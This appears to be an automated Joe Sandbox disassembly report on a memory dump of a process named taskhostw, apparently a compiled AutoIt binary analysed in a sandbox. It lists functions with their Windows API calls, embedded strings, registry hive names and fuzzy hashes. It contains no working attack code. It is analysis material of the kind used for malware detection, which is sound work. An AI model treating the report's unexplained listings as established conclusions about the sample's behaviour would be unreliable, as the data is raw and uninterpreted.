Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: abbea345e11b4da9e252b3d1ac373de96501054550d8c3752b4fb158581261aa
Instruction ID: cf8cf9fe84144d24b8463bc489f8fabbf58acd4ae06b3b89c5d74a1e833765bf
Opcode Fuzzy Hash: abbea345e11b4da9e252b3d1ac373de96501054550d8c3752b4fb158581261aa
Instruction Fuzzy Hash: EAA1B171244706AFDB14DF28C884BEAB7E9FF04354F144629F999D2190DB30E995CBB2

Function 00D4B196 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00D4B1DA
_wcscmp.LIBCMT ref: 00D4B1EB
GetWindowTextW.USER32(00000001,?,00000400), ref: 00D4B213
CharUpperBuffW.USER32(?,00000000), ref: 00D4B230
_wcscmp.LIBCMT ref: 00D4B24E
_wcsstr.LIBCMT ref: 00D4B25F
GetClassNameW.USER32(00000018,?,00000400), ref: 00D4B297
_wcscmp.LIBCMT ref: 00D4B2A7
GetWindowTextW.USER32(00000002,?,00000400), ref: 00D4B2CE
GetClassNameW.USER32(00000018,?,00000400), ref: 00D4B317
_wcscmp.LIBCMT ref: 00D4B327
GetClassNameW.USER32(00000010,?,00000400), ref: 00D4B34F
GetWindowRect.USER32(00000004,?), ref: 00D4B3B8

Strings

@, xrefs: 00D4B1BB
ThumbnailClass, xrefs: 00D4B2A2, 00D4B322

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 880e8d06fb0bbb983372b08f58c2eab54015847fdcf1ab509aee9d0423660ce3
Instruction ID: 17f848ec572382dae458f16ce1d40c1579f1073b481bdd750294cc32f112f59d
Opcode Fuzzy Hash: 880e8d06fb0bbb983372b08f58c2eab54015847fdcf1ab509aee9d0423660ce3
Instruction Fuzzy Hash: 5A819F710083499FDB14DF14D885FAA7BE8EF64328F08856AFD898A0A6DB70DD45CB71

Function 00D4AFDF Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00D4B03E

Strings

[CLASS:, xrefs: 00D4B08E
[HANDLE:, xrefs: 00D4B04A
[LAST, xrefs: 00D4B0EB
[REGEXPTITLE:, xrefs: 00D4B066
ACTIVE, xrefs: 00D4B019
LAST, xrefs: 00D4B003
[ALL, xrefs: 00D4B0E4
HANDLE=, xrefs: 00D4B037
[ACTIVE, xrefs: 00D4B02B
CLASSNAME=, xrefs: 00D4B07B
ALL, xrefs: 00D4B0D2
REGEXP=, xrefs: 00D4B053

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 58798821afab39abd3828cf66a87ca811d1d19d55e3358dea975d0ca55078f47
Instruction ID: 67edbefdd8c2c246a93f3e4a62013744ac28442141c5770cf1761f40c92569e8
Opcode Fuzzy Hash: 58798821afab39abd3828cf66a87ca811d1d19d55e3358dea975d0ca55078f47
Instruction Fuzzy Hash: E131BE31A48209BBDB24EB60CD43EFF77A49F26721F240116B555710D2EF61AF08D672

Function 00D4C2C0 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32 ref: 00D4C2D3
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00D4C2E5
SetWindowTextW.USER32(?,?), ref: 00D4C2FC
GetDlgItem.USER32(?,000003EA), ref: 00D4C311
SetWindowTextW.USER32(00000000,?), ref: 00D4C317
GetDlgItem.USER32(?,000003E9), ref: 00D4C327
SetWindowTextW.USER32(00000000,?), ref: 00D4C32D
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00D4C34E
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00D4C368
GetWindowRect.USER32(?,?), ref: 00D4C371
SetWindowTextW.USER32(?,?), ref: 00D4C3DC
GetDesktopWindow.USER32 ref: 00D4C3E2
GetWindowRect.USER32(00000000), ref: 00D4C3E9
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00D4C435
GetClientRect.USER32(?,?), ref: 00D4C442
PostMessageW.USER32 ref: 00D4C467
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00D4C492

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 57c8ef611870e3f2045840331d4d73e9d19ba50d2520a6c5d133a3f91554350a
Instruction ID: ed326a05a04075cea6f19fcba90e40f811a94cc10e710d91475456a322992f8e
Opcode Fuzzy Hash: 57c8ef611870e3f2045840331d4d73e9d19ba50d2520a6c5d133a3f91554350a
Instruction Fuzzy Hash: 54515D31901709EFDB20DFA8DE89B6EBBF5FF04705F004528E586E26A0D775A944CB60

Function 00D65113 Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32 ref: 00D65129
LoadCursorW.USER32 ref: 00D65134
LoadCursorW.USER32 ref: 00D6513F
LoadCursorW.USER32 ref: 00D6514A
LoadCursorW.USER32 ref: 00D65155
LoadCursorW.USER32 ref: 00D65160
LoadCursorW.USER32 ref: 00D6516B
LoadCursorW.USER32 ref: 00D65176
LoadCursorW.USER32 ref: 00D65181
LoadCursorW.USER32 ref: 00D6518C
LoadCursorW.USER32 ref: 00D65197
LoadCursorW.USER32 ref: 00D651A2
LoadCursorW.USER32 ref: 00D651AD
LoadCursorW.USER32 ref: 00D651B8
LoadCursorW.USER32 ref: 00D651C3
LoadCursorW.USER32 ref: 00D651CE
GetCursorInfo.USER32(?), ref: 00D651DE

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 7a8e7181ee5d56aaa27fbdea5a905ca7f97f578eaf2ddfbc8506a176844371cb
Instruction ID: 855a6cfb53aeeab390b394fa7439151e14e676c175237eec60212ce501b3728c
Opcode Fuzzy Hash: 7a8e7181ee5d56aaa27fbdea5a905ca7f97f578eaf2ddfbc8506a176844371cb
Instruction Fuzzy Hash: 663118B0D483196BDB109FB69C8996EBFE8FF04750F50452AE50DE7280DA7865408EA5

Function 00D7A1EB Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D7A28B
DestroyWindow.USER32 ref: 00D7A305

Part of subcall function 00CF7D2C: _memmove.LIBCMT ref: 00CF7D66

CreateWindowExW.USER32 ref: 00D7A37F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00D7A3A1
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D7A3B4
DestroyWindow.USER32 ref: 00D7A3D6
CreateWindowExW.USER32 ref: 00D7A40D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D7A426
GetDesktopWindow.USER32 ref: 00D7A43F
GetWindowRect.USER32(00000000), ref: 00D7A446
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00D7A45E
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00D7A476

Part of subcall function 00CF25DB: GetWindowLongW.USER32(?,000000EB), ref: 00CF25EC

Strings

0, xrefs: 00D7A2A1
tooltips_class32, xrefs: 00D7A378, 00D7A406

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: b034bcec18f22d7685b84a6b0cf05c470b4045eb1b8728521b43e8533f4b90c8
Instruction ID: c948346dc7969edfc94d6d85d4118ac2a16c1a59bcfc0aad8983e2db9d179b2b
Opcode Fuzzy Hash: b034bcec18f22d7685b84a6b0cf05c470b4045eb1b8728521b43e8533f4b90c8
Instruction Fuzzy Hash: 03717B71150344AFDB21DF28DC49F6A7BE5EB88704F08461DF98A872A0E771E945CF22

Function 00D7C668 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CF2612: GetWindowLongW.USER32(?,000000EB), ref: 00CF2623

DragQueryPoint.SHELL32(?,?), ref: 00D7C691

Part of subcall function 00D7AB69: ClientToScreen.USER32(?,?), ref: 00D7AB92
Part of subcall function 00D7AB69: GetWindowRect.USER32(?,?), ref: 00D7AC08
Part of subcall function 00D7AB69: PtInRect.USER32(?,?,00D7C07E), ref: 00D7AC18

SendMessageW.USER32(?,000000B0,?,?), ref: 00D7C6FA
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00D7C705
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00D7C728
_wcscat.LIBCMT ref: 00D7C758
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00D7C76F
SendMessageW.USER32(?,000000B0,?,?), ref: 00D7C788
SendMessageW.USER32(?,000000B1,?,?), ref: 00D7C79F
SendMessageW.USER32(?,000000B1,?,?), ref: 00D7C7C1
DragFinish.SHELL32(?), ref: 00D7C7C8
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00D7C8BB

Strings

@GUI_DRAGID, xrefs: 00D7C833
@GUI_DRAGFILE, xrefs: 00D7C86A
@GUI_DROPID, xrefs: 00D7C7E8

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 5ec06a34a913bec59ff890c0e723bf4cf32b7467ad5a8a32f2c55888c6eb169e
Instruction ID: 89f962dfc1512b380d3f96f2961e180be31aa055fa5555f8ac049d621f6efbef
Opcode Fuzzy Hash: 5ec06a34a913bec59ff890c0e723bf4cf32b7467ad5a8a32f2c55888c6eb169e
Instruction Fuzzy Hash: D5616F71108304AFC711EF60DC85DAFBBE8FF89710F00492DF695962A1EB309949DB62

Function 00D743FB Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00D7448D
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00D744D8

Strings

UNCHECK, xrefs: 00D746B4
GETTOTALCOUNT, xrefs: 00D744BF
SELECT, xrefs: 00D74689
GETTEXT, xrefs: 00D7462B
GETITEMCOUNT, xrefs: 00D745BA
COLLAPSE, xrefs: 00D7451E
GETSELECTED, xrefs: 00D745E8
ISCHECKED, xrefs: 00D7465B
EXPAND, xrefs: 00D7458A
CHECK, xrefs: 00D744F8
EXISTS, xrefs: 00D74541

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: a6d7ddd86a16a15fa05dc06f2d9df49c36640074d9ffac4406b9daaf76fa6f4d
Instruction ID: 45acf09a9819c421851e5437bfdef584d1b28bed4edcece63999625f9e428b9f
Opcode Fuzzy Hash: a6d7ddd86a16a15fa05dc06f2d9df49c36640074d9ffac4406b9daaf76fa6f4d
Instruction Fuzzy Hash: E6918E302047019FCB15EF10C491AAEB7A1EF85354F14885CF99A5B3A2DB70ED4ADBB2

Function 00D5A3DC Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00CF9997: __itow.LIBCMT ref: 00CF99C2
Part of subcall function 00CF9997: __swprintf.LIBCMT ref: 00CF9A0C

CharLowerBuffW.USER32(?,?), ref: 00D5A455
GetDriveTypeW.KERNEL32 ref: 00D5A4A2
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D5A4EA
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D5A521
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D5A54F

Part of subcall function 00CF7D2C: _memmove.LIBCMT ref: 00CF7D66

Strings

wait, xrefs: 00D5A50C
type cdaudio alias cd wait, xrefs: 00D5A4CD
close, xrefs: 00D5A45B
close cd wait, xrefs: 00D5A53A
set cd door , xrefs: 00D5A4F0
open , xrefs: 00D5A4B1
open, xrefs: 00D5A47C
closed, xrefs: 00D5A469, 00D5A472

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 823366132e6e59438730490c30865b1a101a6260b25c498d02878b88e0fa79f7
Instruction ID: cd59d3c3ab405d4e4c791db145849169611f0c7ee9919caa720fc8ee190e0e5a
Opcode Fuzzy Hash: 823366132e6e59438730490c30865b1a101a6260b25c498d02878b88e0fa79f7
Instruction Fuzzy Hash: 41515C711043089FC740EF24C89196AB7E4FF84758F044A6DF99A97261DB31EE09DB63

Function 00D7C216 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00CF2612: GetWindowLongW.USER32(?,000000EB), ref: 00CF2623

PostMessageW.USER32 ref: 00D7C266
GetFocus.USER32(?,?,?,?), ref: 00D7C276
GetDlgCtrlID.USER32 ref: 00D7C281
_memset.LIBCMT ref: 00D7C3AC
GetMenuItemInfoW.USER32 ref: 00D7C3D7
GetMenuItemCount.USER32(?), ref: 00D7C3F7
GetMenuItemID.USER32(?,00000000), ref: 00D7C40A
GetMenuItemInfoW.USER32 ref: 00D7C43E
GetMenuItemInfoW.USER32 ref: 00D7C486
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00D7C4BE
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00D7C4F3

Strings

0, xrefs: 00D7C3A4

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: afd2f520413628611f9aa07334bf14445e661bf43f5663f4010aff6ec3c3e8c2
Instruction ID: 1e1547addd365b6135b8611e5a980b6942c8041127019f6ffde8c55ba53a7c2a
Opcode Fuzzy Hash: afd2f520413628611f9aa07334bf14445e661bf43f5663f4010aff6ec3c3e8c2
Instruction Fuzzy Hash: FC816D71218301AFD720DF14D894A6A7BE5EF88318F04952EF99997291E770E845CBB2

Function 00CF6BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00D10AD7: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00CF6C6C,?,00008000), ref: 00D10AF3

Part of subcall function 00CF48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00CF48A1,?,?,00CF37C0,?), ref: 00CF48CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00CF6D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 00CF6E5A

Part of subcall function 00CF59CD: _wcscpy.LIBCMT ref: 00CF5A05

Part of subcall function 00D137BD: _iswctype.LIBCMT ref: 00D137C5

Strings

Unterminated string, xrefs: 00D2EB3D
Bad directive syntax error, xrefs: 00D2EAF6
AU3!, xrefs: 00CF6CC1
>>>AUTOIT SCRIPT<<<, xrefs: 00D2E7EF
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00D2E77A
Error opening the file, xrefs: 00D2E796, 00D2E811
EA06, xrefs: 00D2E7AB

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: cf835343086c0bcf6d9c096c517b1626cc35fc9e66dfb51aefdf002a59289f87
Instruction ID: 705d423d20fe1f13ea87d683f59900bef1ab6ff39d6783a21fac0a7583fdfc7f
Opcode Fuzzy Hash: cf835343086c0bcf6d9c096c517b1626cc35fc9e66dfb51aefdf002a59289f87
Instruction Fuzzy Hash: 130299311083449FC764EF24D881AAFBBE5EF99314F04491DF69A932A1DB30DA49DB63

Function 00CF45DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CF45F9
GetMenuItemCount.USER32(00DB5890), ref: 00D2D6FD
GetMenuItemCount.USER32(00DB5890), ref: 00D2D7AD
GetCursorPos.USER32(?), ref: 00D2D7F1
SetForegroundWindow.USER32(00000000), ref: 00D2D7FA
TrackPopupMenuEx.USER32 ref: 00D2D80D
PostMessageW.USER32 ref: 00D2D819

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 4b476672f7982ba2c9c8a32cc51a75be92572fa7f51ec3cb417836e8ad820dcd
Instruction ID: d0cb47123fe0a37c81ecef59371c0746484a9a80a67174c581387c650b89f609
Opcode Fuzzy Hash: 4b476672f7982ba2c9c8a32cc51a75be92572fa7f51ec3cb417836e8ad820dcd
Instruction Fuzzy Hash: D771E330600219BFFB249F14EC49FAABF66FF15369F244216F619A62E0C7B16850DB71

Function 00D70EA5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00D70EBC

Strings

HKEY_CURRENT_USER, xrefs: 00D70F9B
HKEY_CLASSES_ROOT, xrefs: 00D70F4F
HKCC, xrefs: 00D70F8A
HKEY_LOCAL_MACHINE, xrefs: 00D70F25
HKU, xrefs: 00D70FCE
HKLM, xrefs: 00D70F3A
HKCR, xrefs: 00D70F64
HKEY_USERS, xrefs: 00D70FBD
HKCU, xrefs: 00D70FAC
HKEY_CURRENT_CONFIG, xrefs: 00D70F79

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: d9f6b4a277f6eb1fb6eaf282ada3bff0d645d671748a9cf4ac176f493a9083e0
Instruction ID: 8571bd1a329b3a11bdb8dd57d48a42feab09be878c91de35e814de4a5cba00b3
Opcode Fuzzy Hash: d9f6b4a277f6eb1fb6eaf282ada3bff0d645d671748a9cf4ac176f493a9083e0
Instruction Fuzzy Hash: 08418E3010024A9BCF20EF14E8A1AEE7B21EF16300F548518FD555B392EBB5DD9ADBB1

Function 00D5536E Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00CF7D2C: _memmove.LIBCMT ref: 00CF7D66

Part of subcall function 00CF7A84: _memmove.LIBCMT ref: 00CF7B0D

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00D553D7
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00D553ED
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D553FE
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00D55410
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00D55421

Strings

play PlayMe wait, xrefs: 00D5540B
close PlayMe, xrefs: 00D553E8, 00D55415
play PlayMe, xrefs: 00D5541C
status PlayMe mode, xrefs: 00D553D2
open , xrefs: 00D55386
alias PlayMe, xrefs: 00D553B0

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: SendString$_memmove
